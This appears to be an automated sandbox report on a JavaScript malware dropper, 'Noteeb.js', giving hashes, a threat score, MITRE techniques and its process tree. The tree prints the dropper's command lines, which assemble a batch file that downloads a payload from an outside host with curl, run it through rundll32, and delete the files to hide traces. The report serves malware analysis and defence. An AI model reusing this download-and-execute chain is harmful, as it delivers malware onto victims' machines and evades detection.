4a6d8020b61623b5a13a4fc27c5de1d1ae71c56b456b9646e1c5711f94caab82

Analysis

max time kernel
122s
max time network
123s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
12-12-2023 14:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Noteeb.js
Size

79KB
MD5

8ff33e1d1f20a1be265bd996c00d1463
SHA1

d01ff951755e8f2c8f9a3e3697cd3cc1e0ffae4d
SHA256

2dde87c739be776f15f4f269d527e3ab96429a2947c8e9cd8a51e39050ffe73a
SHA512

3663e9e29f73f380d6bfd2e6bd851620a100a1a8997a05df57b599f336f601e95f201cf18417fa4f5088c8a787b41af6ea5eb9a313697239e99f0f8f63245051
SSDEEP

1536:SepX4w2rWvddsQs2/HlAB7gKLQGwWAcViP0vW7c3Go:SoIYAUgxW7c3Go

Score

7^/10

Malware Config

Signatures

Deletes itself 1 IoCs

pid	Process
2588	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 27 IoCs

description	pid	Process	procid_target
PID 2928 wrote to memory of 2588	2928	wscript.exe	42
PID 2928 wrote to memory of 2588	2928	wscript.exe	42
PID 2928 wrote to memory of 2588	2928	wscript.exe	42
PID 2928 wrote to memory of 2664	2928	wscript.exe	29
PID 2928 wrote to memory of 2664	2928	wscript.exe	29
PID 2928 wrote to memory of 2664	2928	wscript.exe	29
PID 2664 wrote to memory of 2596	2664	cmd.exe	41
PID 2664 wrote to memory of 2596	2664	cmd.exe	41
PID 2664 wrote to memory of 2596	2664	cmd.exe	41
PID 2664 wrote to memory of 2752	2664	cmd.exe	40
PID 2664 wrote to memory of 2752	2664	cmd.exe	40
PID 2664 wrote to memory of 2752	2664	cmd.exe	40
PID 2928 wrote to memory of 2284	2928	wscript.exe	39
PID 2928 wrote to memory of 2284	2928	wscript.exe	39
PID 2928 wrote to memory of 2284	2928	wscript.exe	39
PID 2928 wrote to memory of 2556	2928	wscript.exe	33
PID 2928 wrote to memory of 2556	2928	wscript.exe	33
PID 2928 wrote to memory of 2556	2928	wscript.exe	33
PID 2928 wrote to memory of 2468	2928	wscript.exe	38
PID 2928 wrote to memory of 2468	2928	wscript.exe	38
PID 2928 wrote to memory of 2468	2928	wscript.exe	38
PID 2928 wrote to memory of 2604	2928	wscript.exe	35
PID 2928 wrote to memory of 2604	2928	wscript.exe	35
PID 2928 wrote to memory of 2604	2928	wscript.exe	35
PID 2928 wrote to memory of 2440	2928	wscript.exe	36
PID 2928 wrote to memory of 2440	2928	wscript.exe	36
PID 2928 wrote to memory of 2440	2928	wscript.exe	36

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Noteeb.js
1⤵
- Suspicious use of WriteProcessMemory
PID:2928
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c echo|set /p="cu" > "C:\Users\Admin\AppData\Local\Temp\culpa.j.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" set /p="cu" 1>"C:\Users\Admin\AppData\Local\Temp\culpa.j.bat""
    3⤵
    PID:2752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo"
    3⤵
    PID:2596
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\culpa.j.bat"
  2⤵
  PID:2556
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\quo.z" iure.h
  2⤵
  PID:2604
- C:\Windows\System32\rundll32.exe
  "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\iure.h" Enter
  2⤵
  PID:2440
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\culpa.j.bat"
  2⤵
  PID:2468
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c echo rl "https://lorented.com/gf4/199960121" --output "C:\Users\Admin\AppData\Local\Temp\quo.z" --ssl-no-revoke --insecure --location >> "C:\Users\Admin\AppData\Local\Temp\culpa.j.bat"
  2⤵
  PID:2284
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\Noteeb.js"
  2⤵
  - Deletes itself
  PID:2588

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\culpa.j.bat

Filesize
133B

MD5
5e9c9b3cdbfd5f0440a7f6a2f9277e98

SHA1
edae3ba46ba0f07ce715c97a266c661c8668862f

SHA256
933eb418352ae7ed45c41566dc89c279239f11ede47300011d559108fe92620a

SHA512
2e5405bea1204e41b1f67989a5bfca7c0beb6d776a1f81db5fd53f57d57f9fbbe6aa35a6eb3251523d9d656aa134ec697f3191589d553e69858aac55c185c843

Download Submit